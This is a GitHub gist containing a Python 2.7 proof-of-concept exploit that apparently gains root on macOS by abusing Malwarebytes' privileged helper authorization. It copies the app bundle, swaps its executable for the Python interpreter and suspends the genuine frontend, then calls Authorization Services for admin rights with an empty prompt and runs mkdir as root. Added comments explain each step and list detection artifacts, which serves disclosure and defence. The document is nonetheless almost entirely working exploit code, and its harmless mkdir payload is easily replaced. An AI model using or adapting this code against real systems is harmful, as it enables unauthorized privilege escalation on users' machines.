Created
October 13, 2020 18:36
Fake privileged helper auth
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python2.7 | |
# -*- coding: utf-8 -*- | |
import os | |
import sys | |
import subprocess | |
import shutil | |
import time | |
# Proof-of-concept from the gist "Fake privileged helper auth" (macOS, Python 2.7).
# What the script visibly does: locates the installed Malwarebytes launcher
# bundle, waits for the frontend to log the start of a scan, copies the bundle
# to /tmp, replaces its main executable with the system Python interpreter,
# suspends the real frontend, runs an embedded Authorization Services script
# through the swapped binary, resumes the frontend and removes its artifacts.
# The gist does not state the root cause it relies on; presumably the
# privileged side trusts the requesting client by bundle path/identifier
# rather than by validating its code signature -- confirm against the
# product before drawing conclusions.
# Review note: GitHub flags this gist as containing bidirectional Unicode
# text; inspect it in an editor that reveals hidden characters before
# trusting the rendered source. Indentation lost in the rendering has been
# restored here; no tokens were changed.
# Detection/mitigation relevance: fixed artifacts /tmp/auth.py and
# /tmp/Malwarebytes.app, a bundle copy whose executable no longer matches its
# signature, SIGSTOP/SIGCONT delivered to the frontend process, and a
# root-owned directory created on the user's Desktop.

# System Python 2.7 executable; it later stands in for the Malwarebytes main binary.
python_bin = "/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python"

# Spotlight lookup of the launcher bundle by bundle identifier (Python 2: str
# result, trailing newline stripped).
last_bundle_path = subprocess.check_output(['mdfind', "kMDItemCFBundleIdentifier == com.malwarebytes.mbam.frontend.launcher"]).strip("\n")
if not last_bundle_path:
    print("Hmm, no Malwarebytes found!!!")
    sys.exit(-1)

# Block until the frontend logs the scan-in-progress UI title, i.e. a scan is
# running. stderr is piped but never consumed, and this `log stream` process is
# never terminated; it is still running when `f` is rebound below.
f = subprocess.Popen(['log', 'stream', '--predicate', 'process == "FrontendApplication" && eventMessage CONTAINS[c] "scanInProgress"', '--debug'], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
while True:
    line = f.stdout.readline()
    if "inProgress.title.scanInProgress" in line:
        break
print("Malware scan started")

# Script executed by the swapped-in interpreter (adapted from the gist linked
# below). It asks Authorization Services for three rights at once --
# ServiceManagement daemons.modify, blesshelper and system.privilege.admin --
# with an empty prompt and PreAuthorize|ExtendRights|InteractionAllowed, and
# only if AuthorizationCopyRights returns 0 does it run /bin/mkdir through
# AuthorizationExecuteWithPrivileges to create ~/Desktop/DirOwnedByRoot as the
# observable result. The string is runtime data written to disk, so its text
# is left exactly as written.
tmp_script = "/tmp/auth.py"
# most of code from https://gist.github.com/pudquick/bc1ad98e7ee0a50fba94
with open(tmp_script, "w") as f:
    f.write('''#!/usr/bin/python2.7
import os
from ctypes import CDLL, Structure, POINTER, c_char_p, c_size_t, c_void_p, c_uint32, pointer, byref
Security = CDLL('/System/Library/Frameworks/Security.framework/Versions/Current/Security')
prompt = ""
mkdir_bin = "/bin/mkdir"
flag_path = os.path.join(os.path.expanduser("~/Desktop"), "DirOwnedByRoot")
class OpaqueType(Structure):
    pass
class AuthorizationItem(Structure):
    _fields_ = [('name', c_char_p),
                ('valueLength', c_size_t),
                ('value', c_char_p),
                ('flags', c_uint32),
               ]
class AuthorizationItemSet(Structure):
    _fields_ = [('count', c_uint32),
                ('items', POINTER(AuthorizationItem)),
               ]
class FILE(Structure):
    pass
OpaqueTypeRef = POINTER(OpaqueType)
AuthorizationRef = OpaqueTypeRef
kSMRightModifySystemDaemons = "com.apple.ServiceManagement.daemons.modify"
kSMRightBlessPrivilegedHelper = "com.apple.ServiceManagement.blesshelper"
kAuthorizationRightExecute = "system.privilege.admin"
kAuthorizationEnvironmentPrompt = "prompt"
kAuthorizationEmptyEnvironment = None
kAuthorizationFlagDefaults = 0
kAuthorizationFlagInteractionAllowed = (1 << 0)
kAuthorizationFlagExtendRights = (1 << 1)
kAuthorizationFlagPartialRights = (1 << 2)
kAuthorizationFlagDestroyRights = (1 << 3)
kAuthorizationFlagPreAuthorize = (1 << 4)
AuthorizationCreate = Security.AuthorizationCreate
AuthorizationCopyRights = Security.AuthorizationCopyRights
AuthorizationExecuteWithPrivileges = Security.AuthorizationExecuteWithPrivileges
authref = AuthorizationRef()
result = AuthorizationCreate(None, kAuthorizationEmptyEnvironment, kAuthorizationFlagDefaults, byref(authref))
multi_right = (AuthorizationItem*3)()
multi_right[0].name = kSMRightModifySystemDaemons
multi_right[1].name = kSMRightBlessPrivilegedHelper
multi_right[2].name = kAuthorizationRightExecute
rights = AuthorizationItemSet()
rights.count = 3
rights.items = pointer(multi_right[0])
env_items = (AuthorizationItem*1)()
env_items[0].name = kAuthorizationEnvironmentPrompt
env_items[0].valueLength = len(prompt)
env_items[0].value = prompt
env = AuthorizationItemSet()
env.count = 1
env.items = pointer(env_items[0])
flags = kAuthorizationFlagDefaults | kAuthorizationFlagPreAuthorize | kAuthorizationFlagExtendRights | kAuthorizationFlagInteractionAllowed
result = AuthorizationCopyRights(authref, byref(rights), byref(env), flags, None)
argv = [flag_path]
argv = (c_char_p * (len(argv) + 1))(*(argv + [None]))
channel = POINTER(FILE)()
if result == 0:
    result = AuthorizationExecuteWithPrivileges(authref, mkdir_bin, kAuthorizationFlagDefaults, argv, byref(channel))
''')

# PID of the running Malwarebytes frontend (Python 2: str, trailing newline stripped).
mbam_pid = subprocess.check_output(['pgrep', 'FrontendApplication']).strip("\n")
# Work on a copy under /tmp so the installed bundle on disk is left untouched.
tmp_bundle_path = "/tmp/Malwarebytes.app"
shutil.copytree(last_bundle_path, tmp_bundle_path)
mbam_bin = os.path.join(tmp_bundle_path, "Contents", "MacOS", "Malwarebytes")
# Replace the copied main executable with the Python interpreter. The copy
# keeps its Info.plist and bundle identifier, but if the original bundle was
# signed its executable no longer matches that signature -- a signature check
# on the requesting client would catch this.
os.unlink(mbam_bin)
shutil.copy(python_bin, mbam_bin)
# Suspend the genuine frontend while the swapped binary runs the auth script,
# then resume it. The gist does not say why the suspension is needed; confirm.
subprocess.check_call(["kill", "-SIGSTOP", mbam_pid])
subprocess.check_call([mbam_bin, tmp_script])
subprocess.check_call(["kill", "-SIGCONT", mbam_pid])
# Remove the on-disk artifacts; the root-owned Desktop directory, if created,
# remains as the evidence of success.
os.unlink(tmp_script)
shutil.rmtree(tmp_bundle_path)